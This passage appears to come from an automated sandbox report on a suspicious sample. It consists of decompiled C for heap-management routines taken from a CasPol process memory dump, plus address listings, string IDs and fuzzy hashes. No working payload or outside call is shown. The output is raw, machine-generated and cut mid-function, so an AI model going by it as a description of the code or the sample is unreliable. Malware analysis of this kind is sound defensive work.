								_t264[0] = _t264[0] ^ _t264[0] ^  *_t264;
								 *_t264 =  *_t264 ^ _t331[0x14];
							}
							_t326 =  *_t326;
							if( &(_t331[0x27]) == _t326) {
								goto L49;
							} else {
								_t281 = 0x81;
								continue;
							}
						}
						__eflags = _t331[0x13];
						if(_t331[0x13] != 0) {
							 *(_t326 + 0x1b) =  *(_t326 + 0x1a) ^  *(_t326 + 0x19) ^  *(_t326 + 0x18);
							 *(_t326 + 0x18) =  *(_t326 + 0x18) ^ _t331[0x14];
						}
						goto L65;
					}
				} else {
					L83:
					return _t267;
				}
			}



























































                                                                        0x014744a1
                                                                        0x014744a3
                                                                        0x014744a7
                                                                        0x014744ac
                                                                        0x014744af
                                                                        0x014744b2
                                                                        0x014744b9
                                                                        0x014744bc
                                                                        0x014747f2
                                                                        0x014747f2
                                                                        0x014747f8
                                                                        0x014747fc
                                                                        0x014747fe
                                                                        0x01474804
                                                                        0x01474805
                                                                        0x01474805
                                                                        0x0147480c
                                                                        0x01474810
                                                                        0x01474812
                                                                        0x01474812
                                                                        0x01474812
                                                                        0x01474822
                                                                        0x01474822
                                                                        0x01474827
                                                                        0x01474827
                                                                        0x00000000
                                                                        0x01474827
                                                                        0x014744c4
                                                                        0x014744d3
                                                                        0x014744d9
                                                                        0x014744dc
                                                                        0x014744de
                                                                        0x014744e0
                                                                        0x01474560
                                                                        0x01474520
                                                                        0x01474522
                                                                        0x01474525
                                                                        0x01474528
                                                                        0x0147452b
                                                                        0x0147452e
                                                                        0x01474530
                                                                        0x01474697
                                                                        0x0147469d
                                                                        0x014746a1
                                                                        0x014746c0
                                                                        0x014746c5
                                                                        0x014746a3
                                                                        0x014746b8
                                                                        0x014746bd
                                                                        0x014746cb
                                                                        0x014746d4
                                                                        0x01474677
                                                                        0x01474677
                                                                        0x01474679
                                                                        0x0147467c
                                                                        0x0147468a
                                                                        0x01474690
                                                                        0x01474690
                                                                        0x014747f1
                                                                        0x014747f1
                                                                        0x014747f1
                                                                        0x00000000
                                                                        0x014747f1
                                                                        0x01474536
                                                                        0x01474539
                                                                        0x0147453c
                                                                        0x01474636
                                                                        0x0147463c
                                                                        0x01474640
                                                                        0x0147465f
                                                                        0x01474664
                                                                        0x01474642
                                                                        0x01474657
                                                                        0x0147465c
                                                                        0x01474670
                                                                        0x00000000
                                                                        0x01474542
                                                                        0x01474542
                                                                        0x01474546
                                                                        0x01474548
                                                                        0x0147454b
                                                                        0x01474555
                                                                        0x0147455b
                                                                        0x0147455b
                                                                        0x0147455b
                                                                        0x0147455d
                                                                        0x0147455d
                                                                        0x0147455d
                                                                        0x00000000
                                                                        0x0147455d
                                                                        0x0147453c
                                                                        0x01474579
                                                                        0x0147457c
                                                                        0x01474587
                                                                        0x01474589
                                                                        0x01474591
                                                                        0x01474592
                                                                        0x01474597
                                                                        0x01474598
                                                                        0x014745a1
                                                                        0x014745ab
                                                                        0x014745ab
                                                                        0x014745a1
                                                                        0x014745ae
                                                                        0x014745b4
                                                                        0x014745b9
                                                                        0x014745bd
                                                                        0x01474759
                                                                        0x01474759
                                                                        0x0147475f
                                                                        0x01474761
                                                                        0x01474763
                                                                        0x01474765
                                                                        0x01474768
                                                                        0x0147476b
                                                                        0x0147476d
                                                                        0x0147479c
                                                                        0x0147479c
                                                                        0x0147479f
                                                                        0x014747a2
                                                                        0x014747a4
                                                                        0x01474830
                                                                        0x01474833
                                                                        0x01474879
                                                                        0x0147487d
                                                                        0x014748f1
                                                                        0x014748f3
                                                                        0x014748f3
                                                                        0x00000000
                                                                        0x014748f3
                                                                        0x0147487f
                                                                        0x01474885
                                                                        0x01474887
                                                                        0x014748a8
                                                                        0x014748a8
                                                                        0x014748ae
                                                                        0x014748b0
                                                                        0x014748dc
                                                                        0x014748dc
                                                                        0x014748dc
                                                                        0x014748dc
                                                                        0x014748ec
                                                                        0x00000000
                                                                        0x014748ec
                                                                        0x014748b2
                                                                        0x014748bc
                                                                        0x014748be
                                                                        0x014748c1
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x014748c3
                                                                        0x014748c3
                                                                        0x014748c6
                                                                        0x014748c9
                                                                        0x014748cc
                                                                        0x014748d1
                                                                        0x014748d4
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x014748d6
                                                                        0x014748d7
                                                                        0x014748da
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x014748da
                                                                        0x0147494f
                                                                        0x01474955
                                                                        0x01474959
                                                                        0x01474978
                                                                        0x0147497d
                                                                        0x0147495b
                                                                        0x01474970
                                                                        0x01474975
                                                                        0x01474986
                                                                        0x01474987
                                                                        0x0147498a
                                                                        0x0147498d
                                                                        0x01474997
                                                                        0x014747ef
                                                                        0x014747ef
                                                                        0x014747ef
                                                                        0x00000000
                                                                        0x014747ef
                                                                        0x01474890
                                                                        0x01474890
                                                                        0x01474891
                                                                        0x01474891
                                                                        0x01474894
                                                                        0x01474897
                                                                        0x0147489d
                                                                        0x014748a0
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x014748a2
                                                                        0x014748a3
                                                                        0x014748a6
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x014748a6
                                                                        0x014748fb
                                                                        0x01474901
                                                                        0x01474905
                                                                        0x01474924
                                                                        0x01474929
                                                                        0x01474907
                                                                        0x0147491c
                                                                        0x01474921
                                                                        0x0147492f
                                                                        0x01474935
                                                                        0x01474936
                                                                        0x01474939
                                                                        0x01474942
                                                                        0x00000000
                                                                        0x01474947
                                                                        0x01474835
                                                                        0x0147483b
                                                                        0x0147483f
                                                                        0x0147485e
                                                                        0x01474863
                                                                        0x01474841
                                                                        0x01474856
                                                                        0x0147485b
                                                                        0x01474869
                                                                        0x0147486c
                                                                        0x0147486f
                                                                        0x014747e7
                                                                        0x014747e7
                                                                        0x00000000
                                                                        0x014747ec
                                                                        0x014747aa
                                                                        0x014747b0
                                                                        0x014747b4
                                                                        0x014747d3
                                                                        0x014747d8
                                                                        0x014747b6
                                                                        0x014747cb
                                                                        0x014747d0
                                                                        0x014747de
                                                                        0x014747df
                                                                        0x014747e2
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0147476f
                                                                        0x0147476f
                                                                        0x01474778
                                                                        0x01474785
                                                                        0x01474787
                                                                        0x0147478c
                                                                        0x0147478e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01474790
                                                                        0x01474792
                                                                        0x01474794
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01474796
                                                                        0x01474799
                                                                        0x00000000
                                                                        0x01474799
                                                                        0x00000000
                                                                        0x014745c3
                                                                        0x014745c3
                                                                        0x014745c7
                                                                        0x014745c7
                                                                        0x014745ca
                                                                        0x014745cf
                                                                        0x014745d3
                                                                        0x014745df
                                                                        0x014745e4
                                                                        0x014745e6
                                                                        0x014745e8
                                                                        0x014745ed
                                                                        0x014745ed
                                                                        0x014745f2
                                                                        0x014745f2
                                                                        0x014745f7
                                                                        0x014745fc
                                                                        0x01474602
                                                                        0x01474606
                                                                        0x01474609
                                                                        0x0147460f
                                                                        0x014746de
                                                                        0x014746e3
                                                                        0x014746e5
                                                                        0x014746ec
                                                                        0x014746ee
                                                                        0x014746f6
                                                                        0x014746f6
                                                                        0x014746f6
                                                                        0x014746f6
                                                                        0x014746ec
                                                                        0x01474615
                                                                        0x01474615
                                                                        0x0147461d
                                                                        0x0147462e
                                                                        0x0147462e
                                                                        0x0147461d
                                                                        0x0147460f
                                                                        0x01474609
                                                                        0x014746fd
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01474710
                                                                        0x0147471a
                                                                        0x01474720
                                                                        0x01474720
                                                                        0x01474722
                                                                        0x0147472c
                                                                        0x00000000
                                                                        0x0147472e
                                                                        0x0147472e
                                                                        0x00000000
                                                                        0x0147472e
                                                                        0x0147472c
                                                                        0x01474738
                                                                        0x0147473c
                                                                        0x0147474b
                                                                        0x01474751
                                                                        0x01474751
                                                                        0x00000000
                                                                        0x0147473c
                                                                        0x014748f4
                                                                        0x014748f4
                                                                        0x00000000
                                                                        0x014748f4

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
                                                                        • API String ID: 0-1357697941
                                                                        • Opcode ID: cc4c81a88f3e786865839ff618934fba786f2eac7d42016d3ef0a0220b82fb0b
                                                                        • Instruction ID: 46d69d122e775266ed47546f862bd8541bcb41f943ea61f56aae308b443228b8
                                                                        • Opcode Fuzzy Hash: cc4c81a88f3e786865839ff618934fba786f2eac7d42016d3ef0a0220b82fb0b
                                                                        • Instruction Fuzzy Hash: 31F1FF75600646DFDB25CBA9C480BFAFBF9FF09308F09801AE24697761D734A946CB51
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013DA309 Relevance: 8.2, Strings: 6, Instructions: 687COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 72%
                                                                        			E013DA309(signed int __ecx, signed int __edx, signed int _a4, char _a8) {
				char _v8;
				signed short _v12;
				signed short _v16;
				signed int _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				unsigned int _v52;
				signed int _v56;
				void* _v60;
				intOrPtr _v64;
				void* _v72;
				void* __ebx;
				void* __edi;
				void* __ebp;
				unsigned int _t246;
				signed char _t247;
				signed short _t249;
				unsigned int _t256;
				signed int _t262;
				signed int _t265;
				signed int _t266;
				signed int _t267;
				intOrPtr _t270;
				signed int _t280;
				signed int _t286;
				signed int _t289;
				intOrPtr _t290;
				signed int _t291;
				signed int _t317;
				signed short _t320;
				intOrPtr _t327;
				signed int _t339;
				signed int _t344;
				signed int _t347;
				intOrPtr _t348;
				signed int _t350;
				signed int _t352;
				signed int _t353;
				signed int _t356;
				intOrPtr _t357;
				intOrPtr _t366;
				signed int _t367;
				signed int _t370;
				intOrPtr _t371;
				signed int _t372;
				signed int _t394;
				signed short _t402;
				intOrPtr _t404;
				intOrPtr _t415;
				signed int _t430;
				signed int _t433;
				signed int _t437;
				signed int _t445;
				signed short _t446;
				signed short _t449;
				signed short _t452;
				signed int _t455;
				signed int _t460;
				signed short* _t468;
				signed int _t480;
				signed int _t481;
				signed int _t483;
				intOrPtr _t484;
				signed int _t491;
				unsigned int _t506;
				unsigned int _t508;
				signed int _t513;
				signed int _t514;
				signed int _t521;
				signed short* _t533;
				signed int _t541;
				signed int _t543;
				signed int _t546;
				unsigned int _t551;
				signed int _t553;

				_t450 = __ecx;
				_t553 = __ecx;
				_t539 = __edx;
				_v28 = 0;
				_v40 = 0;
				if(( *(__ecx + 0xcc) ^  *0x14a8a68) != 0) {
					_push(_a4);
					_t513 = __edx;
					L11:
					_t246 = E013DA830(_t450, _t513);
					L7:
					return _t246;
				}
				if(_a8 != 0) {
					__eflags =  *(__edx + 2) & 0x00000008;
					if(( *(__edx + 2) & 0x00000008) != 0) {
						 *((intOrPtr*)(__ecx + 0x230)) =  *((intOrPtr*)(__ecx + 0x230)) - 1;
						_t430 = E013DDF24(__edx,  &_v12,  &_v16);
						__eflags = _t430;
						if(_t430 != 0) {
							_t157 = _t553 + 0x234;
							 *_t157 =  *(_t553 + 0x234) - _v16;
							__eflags =  *_t157;
						}
					}
					_t445 = _a4;
					_t514 = _t539;
					_v48 = _t539;
					L14:
					_t247 =  *((intOrPtr*)(_t539 + 6));
					__eflags = _t247;
					if(_t247 == 0) {
						_t541 = _t553;
					} else {
						_t541 = (_t539 & 0xffff0000) - ((_t247 & 0x000000ff) << 0x10) + 0x10000;
						__eflags = _t541;
					}
					_t249 = 7 + _t445 * 8 + _t514;
					_v12 = _t249;
					__eflags =  *_t249 - 3;
					if( *_t249 == 3) {
						_v16 = _t514 + _t445 * 8 + 8;
						E013B9373(_t553, _t514 + _t445 * 8 + 8);
						_t452 = _v16;
						_v28 =  *(_t452 + 0x10);
						 *((intOrPtr*)(_t541 + 0x30)) =  *((intOrPtr*)(_t541 + 0x30)) - 1;
						_v36 =  *(_t452 + 0x14);
						 *((intOrPtr*)(_t541 + 0x2c)) =  *((intOrPtr*)(_t541 + 0x2c)) - ( *(_t452 + 0x14) >> 0xc);
						 *((intOrPtr*)(_t553 + 0x1e8)) =  *((intOrPtr*)(_t553 + 0x1e8)) +  *(_t452 + 0x14);
						 *((intOrPtr*)(_t553 + 0x1f8)) =  *((intOrPtr*)(_t553 + 0x1f8)) - 1;
						_t256 =  *(_t452 + 0x14);
						__eflags = _t256 - 0x7f000;
						if(_t256 >= 0x7f000) {
							_t142 = _t553 + 0x1ec;
							 *_t142 =  *(_t553 + 0x1ec) - _t256;
							__eflags =  *_t142;
							_t256 =  *(_t452 + 0x14);
						}
						_t513 = _v48;
						_t445 = _t445 + (_t256 >> 3) + 0x20;
						_a4 = _t445;
						_v40 = 1;
					} else {
						_t27 =  &_v36;
						 *_t27 = _v36 & 0x00000000;
						__eflags =  *_t27;
					}
					__eflags =  *((intOrPtr*)(_t553 + 0x54)) -  *((intOrPtr*)(_t513 + 4));
					if( *((intOrPtr*)(_t553 + 0x54)) ==  *((intOrPtr*)(_t513 + 4))) {
						_v44 = _t513;
						_t262 = E013BA9EF(_t541, _t513);
						__eflags = _a8;
						_v32 = _t262;
						if(_a8 != 0) {
							__eflags = _t262;
							if(_t262 == 0) {
								goto L19;
							}
						}
						__eflags =  *0x14a8748 - 1;
						if( *0x14a8748 >= 1) {
							__eflags = _t262;
							if(_t262 == 0) {
								_t415 =  *[fs:0x30];
								__eflags =  *(_t415 + 0xc);
								if( *(_t415 + 0xc) == 0) {
									_push("HEAP: ");
									E013BB150();
								} else {
									E013BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push("(UCRBlock != NULL)");
								E013BB150();
								__eflags =  *0x14a7bc8;
								if( *0x14a7bc8 == 0) {
									__eflags = 1;
									E01472073(_t445, 1, _t541, 1);
								}
								_t513 = _v48;
								_t445 = _a4;
							}
						}
						_t350 = _v40;
						_t480 = _t445 << 3;
						_v20 = _t480;
						_t481 = _t480 + _t513;
						_v24 = _t481;
						__eflags = _t350;
						if(_t350 == 0) {
							_t481 = _t481 + 0xfffffff0;
							__eflags = _t481;
						}
						_t483 = (_t481 & 0xfffff000) - _v44;
						__eflags = _t483;
						_v52 = _t483;
						if(_t483 == 0) {
							__eflags =  *0x14a8748 - 1;
							if( *0x14a8748 < 1) {
								goto L9;
							}
							__eflags = _t350;
							goto L146;
						} else {
							_t352 = E013E174B( &_v44,  &_v52, 0x4000);
							__eflags = _t352;
							if(_t352 < 0) {
								goto L94;
							}
							_t353 = E013D7D50();
							_t447 = 0x7ffe0380;
							__eflags = _t353;
							if(_t353 != 0) {
								_t356 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t356 = 0x7ffe0380;
							}
							__eflags =  *_t356;
							if( *_t356 != 0) {
								_t357 =  *[fs:0x30];
								__eflags =  *(_t357 + 0x240) & 0x00000001;
								if(( *(_t357 + 0x240) & 0x00000001) != 0) {
									E014714FB(_t447, _t553, _v44, _v52, 5);
								}
							}
							_t358 = _v32;
							 *((intOrPtr*)(_t553 + 0x200)) =  *((intOrPtr*)(_t553 + 0x200)) + 1;
							_t484 =  *((intOrPtr*)(_v32 + 0x14));
							__eflags = _t484 - 0x7f000;
							if(_t484 >= 0x7f000) {
								_t90 = _t553 + 0x1ec;
								 *_t90 =  *(_t553 + 0x1ec) - _t484;
								__eflags =  *_t90;
							}
							E013B9373(_t553, _t358);
							_t486 = _v32;
							 *((intOrPtr*)(_v32 + 0x14)) =  *((intOrPtr*)(_v32 + 0x14)) + _v52;
							E013B9819(_t486);
							 *((intOrPtr*)(_t541 + 0x2c)) =  *((intOrPtr*)(_t541 + 0x2c)) + (_v52 >> 0xc);
							 *((intOrPtr*)(_t553 + 0x1e8)) =  *((intOrPtr*)(_t553 + 0x1e8)) - _v52;
							_t366 =  *((intOrPtr*)(_v32 + 0x14));
							__eflags = _t366 - 0x7f000;
							if(_t366 >= 0x7f000) {
								_t104 = _t553 + 0x1ec;
								 *_t104 =  *(_t553 + 0x1ec) + _t366;
								__eflags =  *_t104;
							}
							__eflags = _v40;
							if(_v40 == 0) {
								_t533 = _v52 + _v44;
								_v32 = _t533;
								_t533[2] =  *((intOrPtr*)(_t553 + 0x54));
								__eflags = _v24 - _v52 + _v44;
								if(_v24 == _v52 + _v44) {
									__eflags =  *(_t553 + 0x4c);
									if( *(_t553 + 0x4c) != 0) {
										_t533[1] = _t533[1] ^ _t533[0] ^  *_t533;
										 *_t533 =  *_t533 ^  *(_t553 + 0x50);
									}
								} else {
									_t449 = 0;
									_t533[3] = 0;
									_t533[1] = 0;
									_t394 = _v20 - _v52 >> 0x00000003 & 0x0000ffff;
									_t491 = _t394;
									 *_t533 = _t394;
									__eflags =  *0x14a8748 - 1; // 0x0
									if(__eflags >= 0) {
										__eflags = _t491 - 1;
										if(_t491 <= 1) {
											_t404 =  *[fs:0x30];
											__eflags =  *(_t404 + 0xc);
											if( *(_t404 + 0xc) == 0) {
												_push("HEAP: ");
												E013BB150();
											} else {
												E013BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
											}
											_push("((LONG)FreeEntry->Size > 1)");
											E013BB150();
											_pop(_t491);
											__eflags =  *0x14a7bc8 - _t449; // 0x0
											if(__eflags == 0) {
												__eflags = 0;
												_t491 = 1;
												E01472073(_t449, 1, _t541, 0);
											}
											_t533 = _v32;
										}
									}
									_t533[1] = _t449;
									__eflags =  *((intOrPtr*)(_t541 + 0x18)) - _t541;
									if( *((intOrPtr*)(_t541 + 0x18)) != _t541) {
										_t402 = (_t533 - _t541 >> 0x10) + 1;
										_v16 = _t402;
										__eflags = _t402 - 0xfe;
										if(_t402 >= 0xfe) {
											_push(_t491);
											_push(_t449);
											E0147A80D( *((intOrPtr*)(_t541 + 0x18)), 3, _t533, _t541);
											_t533 = _v48;
											_t402 = _v32;
										}
										_t449 = _t402;
									}
									_t533[3] = _t449;
									E013DA830(_t553, _t533,  *_t533 & 0x0000ffff);
									_t447 = 0x7ffe0380;
								}
							}
							_t367 = E013D7D50();
							__eflags = _t367;
							if(_t367 != 0) {
								_t370 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t370 = _t447;
							}
							__eflags =  *_t370;
							if( *_t370 != 0) {
								_t371 =  *[fs:0x30];
								__eflags =  *(_t371 + 0x240) & 1;
								if(( *(_t371 + 0x240) & 1) != 0) {
									__eflags = E013D7D50();
									if(__eflags != 0) {
										_t447 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
									}
									E01471411(_t447, _t553, _v44, __eflags, _v52,  *(_t553 + 0x74) << 3, _v40, _v36,  *_t447 & 0x000000ff);
								}
							}
							_t372 = E013D7D50();
							_t546 = 0x7ffe038a;
							_t446 = 0x230;
							__eflags = _t372;
							if(_t372 != 0) {
								_t246 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
							} else {
								_t246 = 0x7ffe038a;
							}
							__eflags =  *_t246;
							if( *_t246 == 0) {
								goto L7;
							} else {
								__eflags = E013D7D50();
								if(__eflags != 0) {
									_t546 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + _t446;
									__eflags = _t546;
								}
								_push( *_t546 & 0x000000ff);
								_push(_v36);
								_push(_v40);
								goto L120;
							}
						}
					} else {
						L19:
						_t31 = _t513 + 0x101f; // 0x101f
						_t455 = _t31 & 0xfffff000;
						_t32 = _t513 + 0x28; // 0x28
						_v44 = _t455;
						__eflags = _t455 - _t32;
						if(_t455 == _t32) {
							_t455 = _t455 + 0x1000;
							_v44 = _t455;
						}
						_t265 = _t445 << 3;
						_v24 = _t265;
						_t266 = _t265 + _t513;
						__eflags = _v40;
						_v20 = _t266;
						if(_v40 == 0) {
							_t266 = _t266 + 0xfffffff0;
							__eflags = _t266;
						}
						_t267 = _t266 & 0xfffff000;
						_v52 = _t267;
						__eflags = _t267 - _t455;
						if(_t267 < _t455) {
							__eflags =  *0x14a8748 - 1; // 0x0
							if(__eflags < 0) {
								L9:
								_t450 = _t553;
								L10:
								_push(_t445);
								goto L11;
							}
							__eflags = _v40;
							L146:
							if(__eflags == 0) {
								goto L9;
							}
							_t270 =  *[fs:0x30];
							__eflags =  *(_t270 + 0xc);
							if( *(_t270 + 0xc) == 0) {
								_push("HEAP: ");
								E013BB150();
							} else {
								E013BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push("(!TrailingUCR)");
							E013BB150();
							__eflags =  *0x14a7bc8;
							if( *0x14a7bc8 == 0) {
								__eflags = 0;
								E01472073(_t445, 1, _t541, 0);
							}
							L152:
							_t445 = _a4;
							L153:
							_t513 = _v48;
							goto L9;
						}
						_v32 = _t267;
						_t280 = _t267 - _t455;
						_v32 = _v32 - _t455;
						__eflags = _a8;
						_t460 = _v32;
						_v52 = _t460;
						if(_a8 != 0) {
							L27:
							__eflags = _t280;
							if(_t280 == 0) {
								L33:
								_t446 = 0;
								__eflags = _v40;
								if(_v40 == 0) {
									_t468 = _v44 + _v52;
									_v36 = _t468;
									_t468[2] =  *((intOrPtr*)(_t553 + 0x54));
									__eflags = _v20 - _v52 + _v44;
									if(_v20 == _v52 + _v44) {
										__eflags =  *(_t553 + 0x4c);
										if( *(_t553 + 0x4c) != 0) {
											_t468[1] = _t468[1] ^ _t468[0] ^  *_t468;
											 *_t468 =  *_t468 ^  *(_t553 + 0x50);
										}
									} else {
										_t468[3] = 0;
										_t468[1] = 0;
										_t317 = _v24 - _v52 - _v44 + _t513 >> 0x00000003 & 0x0000ffff;
										_t521 = _t317;
										 *_t468 = _t317;
										__eflags =  *0x14a8748 - 1; // 0x0
										if(__eflags >= 0) {
											__eflags = _t521 - 1;
											if(_t521 <= 1) {
												_t327 =  *[fs:0x30];
												__eflags =  *(_t327 + 0xc);
												if( *(_t327 + 0xc) == 0) {
													_push("HEAP: ");
													E013BB150();
												} else {
													E013BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
												}
												_push("(LONG)FreeEntry->Size > 1");
												E013BB150();
												__eflags =  *0x14a7bc8 - _t446; // 0x0
												if(__eflags == 0) {
													__eflags = 1;
													E01472073(_t446, 1, _t541, 1);
												}
												_t468 = _v36;
											}
										}
										_t468[1] = _t446;
										_t522 =  *((intOrPtr*)(_t541 + 0x18));
										__eflags =  *((intOrPtr*)(_t541 + 0x18)) - _t541;
										if( *((intOrPtr*)(_t541 + 0x18)) == _t541) {
											_t320 = _t446;
										} else {
											_t320 = (_t468 - _t541 >> 0x10) + 1;
											_v12 = _t320;
											__eflags = _t320 - 0xfe;
											if(_t320 >= 0xfe) {
												_push(_t468);
												_push(_t446);
												E0147A80D(_t522, 3, _t468, _t541);
												_t468 = _v52;
												_t320 = _v28;
											}
										}
										_t468[3] = _t320;
										E013DA830(_t553, _t468,  *_t468 & 0x0000ffff);
									}
								}
								E013DB73D(_t553, _t541, _v44 + 0xffffffe8, _v52, _v48,  &_v8);
								E013DA830(_t553, _v64, _v24);
								_t286 = E013D7D50();
								_t542 = 0x7ffe0380;
								__eflags = _t286;
								if(_t286 != 0) {
									_t289 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								} else {
									_t289 = 0x7ffe0380;
								}
								__eflags =  *_t289;
								if( *_t289 != 0) {
									_t290 =  *[fs:0x30];
									__eflags =  *(_t290 + 0x240) & 1;
									if(( *(_t290 + 0x240) & 1) != 0) {
										__eflags = E013D7D50();
										if(__eflags != 0) {
											_t542 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
											__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										}
										E01471411(_t446, _t553, _v44, __eflags, _v52,  *(_t553 + 0x74) << 3, _t446, _t446,  *_t542 & 0x000000ff);
									}
								}
								_t291 = E013D7D50();
								_t543 = 0x7ffe038a;
								__eflags = _t291;
								if(_t291 != 0) {
									_t246 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
								} else {
									_t246 = 0x7ffe038a;
								}
								__eflags =  *_t246;
								if( *_t246 != 0) {
									__eflags = E013D7D50();
									if(__eflags != 0) {
										_t543 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
										__eflags = _t543;
									}
									_push( *_t543 & 0x000000ff);
									_push(_t446);
									_push(_t446);
									L120:
									_push( *(_t553 + 0x74) << 3);
									_push(_v52);
									_t246 = E01471411(_t446, _t553, _v44, __eflags);
								}
								goto L7;
							}
							 *((intOrPtr*)(_t553 + 0x200)) =  *((intOrPtr*)(_t553 + 0x200)) + 1;
							_t339 = E013E174B( &_v44,  &_v52, 0x4000);
							__eflags = _t339;
							if(_t339 < 0) {
								L94:
								 *((intOrPtr*)(_t553 + 0x210)) =  *((intOrPtr*)(_t553 + 0x210)) + 1;
								__eflags = _v40;
								if(_v40 == 0) {
									goto L153;
								}
								E013DB73D(_t553, _t541, _v28 + 0xffffffe8, _v36, _v48,  &_a4);
								goto L152;
							}
							_t344 = E013D7D50();
							__eflags = _t344;
							if(_t344 != 0) {
								_t347 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t347 = 0x7ffe0380;
							}
							__eflags =  *_t347;
							if( *_t347 != 0) {
								_t348 =  *[fs:0x30];
								__eflags =  *(_t348 + 0x240) & 1;
								if(( *(_t348 + 0x240) & 1) != 0) {
									E014714FB(_t445, _t553, _v44, _v52, 6);
								}
							}
							_t513 = _v48;
							goto L33;
						}
						__eflags =  *_v12 - 3;
						_t513 = _v48;
						if( *_v12 == 3) {
							goto L27;
						}
						__eflags = _t460;
						if(_t460 == 0) {
							goto L9;
						}
						__eflags = _t460 -  *((intOrPtr*)(_t553 + 0x6c));
						if(_t460 <  *((intOrPtr*)(_t553 + 0x6c))) {
							goto L9;
						}
						goto L27;
					}
				}
				_t445 = _a4;
				if(_t445 <  *((intOrPtr*)(__ecx + 0x6c))) {
					_t513 = __edx;
					goto L10;
				}
				_t433 =  *((intOrPtr*)(__ecx + 0x74)) + _t445;
				_v20 = _t433;
				if(_t433 <  *((intOrPtr*)(__ecx + 0x70)) || _v20 <  *(__ecx + 0x1e8) >>  *((intOrPtr*)(__ecx + 0x240)) + 3) {
					_t513 = _t539;
					goto L9;
				} else {
					_t437 = E013D99BF(__ecx, __edx,  &_a4, 0);
					_t445 = _a4;
					_t514 = _t437;
					_v56 = _t514;
					if(_t445 - 0x201 > 0xfbff) {
						goto L14;
					} else {
						E013DA830(__ecx, _t514, _t445);
						_t506 =  *(_t553 + 0x238);
						_t551 =  *((intOrPtr*)(_t553 + 0x1e8)) - ( *(_t553 + 0x74) << 3);
						_t246 = _t506 >> 4;
						if(_t551 < _t506 - _t246) {
							_t508 =  *(_t553 + 0x23c);
							_t246 = _t508 >> 2;
							__eflags = _t551 - _t508 - _t246;
							if(_t551 > _t508 - _t246) {
								_t246 = E013EABD8(_t553);
								 *(_t553 + 0x23c) = _t551;
								 *(_t553 + 0x238) = _t551;
							}
						}
						goto L7;
					}
				}
			}



















































































                                                                        0x013da309
                                                                        0x013da316
                                                                        0x013da319
                                                                        0x013da31d
                                                                        0x013da32d
                                                                        0x013da331
                                                                        0x01421e0d
                                                                        0x01421e10
                                                                        0x013da3cb
                                                                        0x013da3cb
                                                                        0x013da3bd
                                                                        0x013da3c3
                                                                        0x013da3c3
                                                                        0x013da33a
                                                                        0x01421e17
                                                                        0x01421e1b
                                                                        0x01421e1d
                                                                        0x01421e2f
                                                                        0x01421e34
                                                                        0x01421e36
                                                                        0x01421e3c
                                                                        0x01421e3c
                                                                        0x01421e3c
                                                                        0x01421e3c
                                                                        0x01421e36
                                                                        0x01421e42
                                                                        0x01421e45
                                                                        0x01421e47
                                                                        0x013da3f8
                                                                        0x013da3f8
                                                                        0x013da3fb
                                                                        0x013da3fd
                                                                        0x01421e50
                                                                        0x013da403
                                                                        0x013da411
                                                                        0x013da411
                                                                        0x013da411
                                                                        0x013da41e
                                                                        0x013da420
                                                                        0x013da424
                                                                        0x013da427
                                                                        0x013da7c9
                                                                        0x013da7cd
                                                                        0x013da7d2
                                                                        0x013da7d9
                                                                        0x013da7e0
                                                                        0x013da7e3
                                                                        0x013da7ed
                                                                        0x013da7f3
                                                                        0x013da7f9
                                                                        0x013da7ff
                                                                        0x013da802
                                                                        0x013da807
                                                                        0x013da809
                                                                        0x013da809
                                                                        0x013da809
                                                                        0x013da80f
                                                                        0x013da80f
                                                                        0x013da812
                                                                        0x013da81c
                                                                        0x013da821
                                                                        0x013da824
                                                                        0x013da42d
